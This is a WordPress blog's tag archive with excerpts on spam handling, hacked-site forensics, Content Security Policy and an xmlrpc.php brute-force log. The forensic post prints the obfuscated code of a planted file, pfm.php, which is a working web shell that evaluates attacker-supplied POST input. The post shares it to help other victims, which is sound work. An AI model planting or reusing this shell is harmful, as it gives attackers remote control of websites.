Tag: wordpress

WordPress Extend Akismet Spam Delete Time

Akismet, by default, deletes spam after 15 days. This may be fine most people, but I use my spam to control and deny new bots from my site. I cannot use this input when Akismet simply deletes it after the default 15 days. I often times am busier than that.

Here’s a 2016 post on how to extend this 15 day time limit.

You can change the number of days Akismet should keep spam comments in your database. Simply add this code to your theme’s functions.php file or in a site-specific plugin.

add_filter( ‘akismet_delete_comment_interval’, ‘custom_spam_delete_interval’ );

Hacked By Muslim Hacker, Hacked By BLEİSY

Hacked By Muslim Hacker, Hacked By BLEİSY, screen cap, WordPress

Hacked By Muslim Hacker, Hacked By BLEİSY, screen cap, WordPress

A customer site got hacked today. Blue Host, shared service. WP core, plugins, themes all current.

They hacked the index.php on the public_html dir, and had malware code in the replaced index.php, along with 2 extra files. Front page was defaced, but site was left intact.

added files: 9e09ad (data file) and pfm.php (had php code) Here’s the pfm.php code:

<?php
$or=”cIEBldcm”;
$lq=”9TVFsn”;
$avj = str_replace(“j”,””,”sjtrj_jrjejpljajcje”);
$zs=”FsKCRfUE”;
$bu=”Y21kJ10pOw==”;
$qu = $avj(“i”, “”, “ibiaisie6i4i_dieicoide”);
$fh = $avj(“k”,””,”crkekatkek_kfkukncktkikon”);
$hwy = $fh(”, $qu($avj(“c”, “”, $or.$zs.$lq.$bu))); $hwy();
?>

WordPress Trackback Spam Technique for Content Spamming

Recently I have been observing a different WordPress spam technique that uses WP trackbacks. This technique has some interesting characteristics that are unlike other types of spam, so my usual clues as to origin and banning method did not work. Fortunately this technique also has some unique characteristics that can be used to ban them. Fortunately.

WordPress Trackbacks
When one WP site links to another WP site, the WP sites communicate with each other using a method called trackbacks. The first site sends a trackback request to the second site. The second site posts the trackback as a special comment, which invites the user to click through to the first site. These trackbacks are automated, making it convenient for both sites.

Hacked By An0n 3xPloiTeR, 8B0K3N H34R7, Team Pak Cyber Ghosts: Cyber Hack Forensic Examination

Hacked By An0n 3xPloiTeR And 8B0K3N H34R7 Team Pak Cyber Ghosts [P.C.G], main message screen with running footer 1

Hacked By An0n 3xPloiTeR And 8B0K3N H34R7 Team Pak Cyber Ghosts [P.C.G], main message screen with running footer 1

This hack suspended the hosting account and the web site as a malware infected account. The hack set up a malware attack for anyone who visited the site, specifically targeting Windows. I am still trying to figure out how they got in, This is a Pakistani-based attack, or so their message says. I’ll try to document as much as I can to help others in the same situation.

Caught me: Adblock-plus goes Rogue

The National Post put up a news article about user centered design in cars, which turned out to be an ad. I took screen caps of this offending article and wrote about it. The image file name I used included the snippet “-ad-“, which was enough for my ad-block plus browser plugin to remove it from my view. Only after renaming the file name and reuploading it could I actually see the ad. Lesson learned.

Content Security Policy on WordPress

Reading, I was, about a web site security tool from Mozilla, so I had to try it. My site, the one you are on now, rated “D-“. It was no consolation that most sites rate “F”. Within the rating there was this criteria called “Content Security Policy” (CSP) that tweaked my interest.

Content Security Policy: Purpose
A CSP is a policy that you put into the head section of your page that whitelists all the sites that contribute to your page. If someone tries to add something to your page’s content but is not on you CSP, your browser will not load it. This stops a nasty infection of something called “cross site scripting” or XSS.

WordPress Web URIs: wpcspReceiveCSPviol=1 and wpCSPNonce from the WP Content Security Policy Plugin

I started to receive these WordPress URIs after someone read one of my WordPress posts. This confused me. These are connected to WordPress Failure Notices, but not quite.

The first part, wpcspReceiveCSPviol=1, was once used in a WordPress spoof to redirect people to some other site, but there was no other URL and no redirection.

POST /wp?wpcspReceiveCSPviol=1&wpCSPNonce=6606ca489f HTTP/1.1

Brute Force xmlrpc.php Attack on WordPress: Case Study

Brute force attacked, I was, for the xmlrpc.php API in WordPress. Thankfully WordPress was strong enough to ward off this attack. I’ve had random attacks on xmlrpc.php before, but nothing this organized. I thought I’d document a case of 57 xmlrpc.php POST attempts here for all to see. Maybe someone can identify the culprit, as I could not.

I had 57 POSTs to xmlrpc.php on WordPress. They are randomly spaced apart throughout the day, use different IP addresses and hosts, but use the same POST (POST /wp/xmlrpc.php HTTP/1.0), referrer (http://dontai.com/wp/xmlrpc.php) and user agent (Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko)